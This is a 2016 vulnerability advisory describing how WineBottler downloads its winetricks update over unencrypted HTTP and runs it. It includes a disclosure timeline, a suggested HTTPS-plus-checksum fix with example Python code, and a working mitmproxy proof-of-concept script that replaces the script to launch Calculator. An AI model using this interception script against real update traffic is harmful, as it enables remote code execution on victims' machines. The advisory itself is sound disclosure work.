Man in the Middle Remote Code Execution Vulnerability in WineBottler and its Bundles

Metadata
===================================================
Release Date: 17-10-2016
Author: Florian Bogner // Kapsch BusinessCom AG (https://www.kapsch.net/kbc)
Affected product: WineBottler (http://winebottler.kronenberg.org/)
Affected versions: up to the still current version 1.8-rc4
Tested on: OS X El Capitan 10.11.6
CVE: product not covered
URL: https://bogner.sh/2016/10/man-in-the-middle-remote-code-execution-vulnerability-in-winebottler-and-its-bundles/
Video: https://youtu.be/nwcZIn2s6Vc
Vulnerability Status: No patch available - Developer became unresponsive after promising to fix the issue

Product Description
===================================================
WineBottler packages Windows-based programs like browsers, media players, games or business applications snugly into Mac app bundles.

Vulnerability Description
===================================================
Whenever WineBottler is launched it tries to update the bundled winetricks (https://github.com/Winetricks/winetricks) library. However, as this update is carried out over unencrypted HTTP, an attacker with man-in-the-middle capabilities can replace the downloaded winetricks.sh shell script. As the script is also launched immediately after downloading, this is a reliable man-in-the-middle remote code execution vulnerability.

The issue also affects all the bundles created with WineBottler. However, I think it can only be abused on their first launch. This greatly limits the attack surface.

PoC
===================================================
1.) Set up an HTTP proxy like Burp (https://portswigger.net/burp/)
2.) Redirect all HTTP traffic to this proxy
3.) Launch WineBottler
4.) Modify the request to http://winetricks.org/winetricks so that it returns a valid shell script.
5.) Remote code execution has been gained!
The following mitmproxy (https://mitmproxy.org/index.html) script "drunken-winebottler.py" can be used to automate the attack (it uses the mitmproxy 0.17-era inline script API that was current at the time of writing):

    from mitmproxy.models import decoded

    NEWLINE = '\r\n'

    def response(context, flow):
        # Only touch the GET for the winetricks script; the real server answers with a 301.
        if (flow.request.url == "http://winetricks.org/winetricks"
                and flow.response.status_code == 301
                and flow.request.method == "GET"):
            flow.response.status_code = 200  # overwrite 301 status code with 200
            with decoded(flow.response):  # automatically decode gzipped responses
                flow.response.content = ""  # replace original script to launch Calculator.app
                flow.response.content += '#!/bin/sh' + NEWLINE
                flow.response.content += '/usr/bin/open /Applications/Calculator.app'

Disclosure Timeline
===================================================
29.5.2016: The issue has been discovered
30.5.2016: Tried to establish initial contact with the developer using Facebook
31.5.2016: Requested CVE number; retried to contact developer using Facebook
1.6.2016: MITRE declined CVE: The product is not covered.
2.6.2016: Created this documentation; sent to developer using mail
18.6.2016: Developer responded on Facebook
20.6.2016: Developer promised that the winetricks update will be switched to HTTPS. Agreed on 29.7. for the public disclosure
25.7.2016: Tried to contact developer as no new version has been released - no success
29.7.2016: Initially agreed public disclosure date - rescheduled
31.7.2016: Tried again to contact developer - again no success
13.8.2016: Tried a last time to get in touch with the developer - again no success
17.10.2016: Public disclosure although unfixed: Developer unresponsive for several months

Suggested Solution
===================================================
All requests should be carried out over encrypted communication channels like HTTPS. The author already mentioned (https://mike.kronenberg.org/winebottler-1-7-52/) that he is planning to do so in the future. Yet, right now there is no patch available.
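As an added illustration of the suggested fix (example code written for this advisory, not WineBottler's or winetricks' own code): a hardened update routine that refuses any non-HTTPS hop, including a redirect that lands on plaintext HTTP, and checks the downloaded script against a hash shipped with the application before it may be executed. The transport is injected so the example runs offline; the example.invalid URLs, the sample scripts and the transports are constructed stand-ins.

```python
import hashlib
import hmac
from urllib.parse import urlparse

REDIRECT_CODES = {301, 302, 303, 307, 308}


class UpdateRejected(Exception):
    """Raised when the downloaded update must not be handed to a shell."""


def fetch_script(url, transport, expected_sha256, max_redirects=5):
    """Download a script safely: every hop must be HTTPS (a redirect cannot
    downgrade to plaintext) and the body must match a hash shipped with the
    application. `transport(url)` returns (status, headers, body); it is
    injected here so the example runs offline. A real client would use an
    HTTPS library that verifies certificates."""
    for _ in range(max_redirects + 1):
        if urlparse(url).scheme != "https":
            raise UpdateRejected("refusing non-HTTPS URL: %s" % url)
        status, headers, body = transport(url)
        if status in REDIRECT_CODES:
            url = headers.get("Location", "")
            continue
        if status != 200:
            raise UpdateRejected("unexpected status %d" % status)
        digest = hashlib.sha256(body).hexdigest()
        if not hmac.compare_digest(digest, expected_sha256):
            raise UpdateRejected("checksum mismatch, not executing")
        return body
    raise UpdateRejected("too many redirects")


# Constructed sample data standing in for the real winetricks script.
TRUSTED_SCRIPT = b"#!/bin/sh\necho winetricks placeholder\n"
TRUSTED_SHA256 = hashlib.sha256(TRUSTED_SCRIPT).hexdigest()  # would ship with the app
TAMPERED_SCRIPT = b"#!/bin/sh\necho tampered\n"


def honest_transport(url):
    # Hypothetical upstream: one redirect, then the script, all over HTTPS.
    if url == "https://example.invalid/winetricks":
        return 301, {"Location": "https://example.invalid/raw/winetricks"}, b""
    return 200, {}, TRUSTED_SCRIPT


def downgrade_transport(url):
    # The advisory's scenario: the redirect points at plaintext HTTP.
    if url == "https://example.invalid/winetricks":
        return 301, {"Location": "http://winetricks.org/winetricks"}, b""
    return 200, {}, TAMPERED_SCRIPT


def tampered_transport(url):
    # Altered content served directly; caught by the checksum, not the scheme.
    return 200, {}, TAMPERED_SCRIPT
```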
The only workaround would be to block outgoing (HTTP) connections - however, whenever I tried that WineBottler stalled...

Florian Bogner | Security Solutions
ICT Technology Solutions
Mobile +43 664 628 5491 | florian.bogner@kapsch.net
Kapsch BusinessCom AG | Wienerbergstrasse 53 | 1120 Wien | Austria
www.kapschbusiness.com | www.kapsch.net
Commercial register: HG Wien FN 178368g | Registered office: Vienna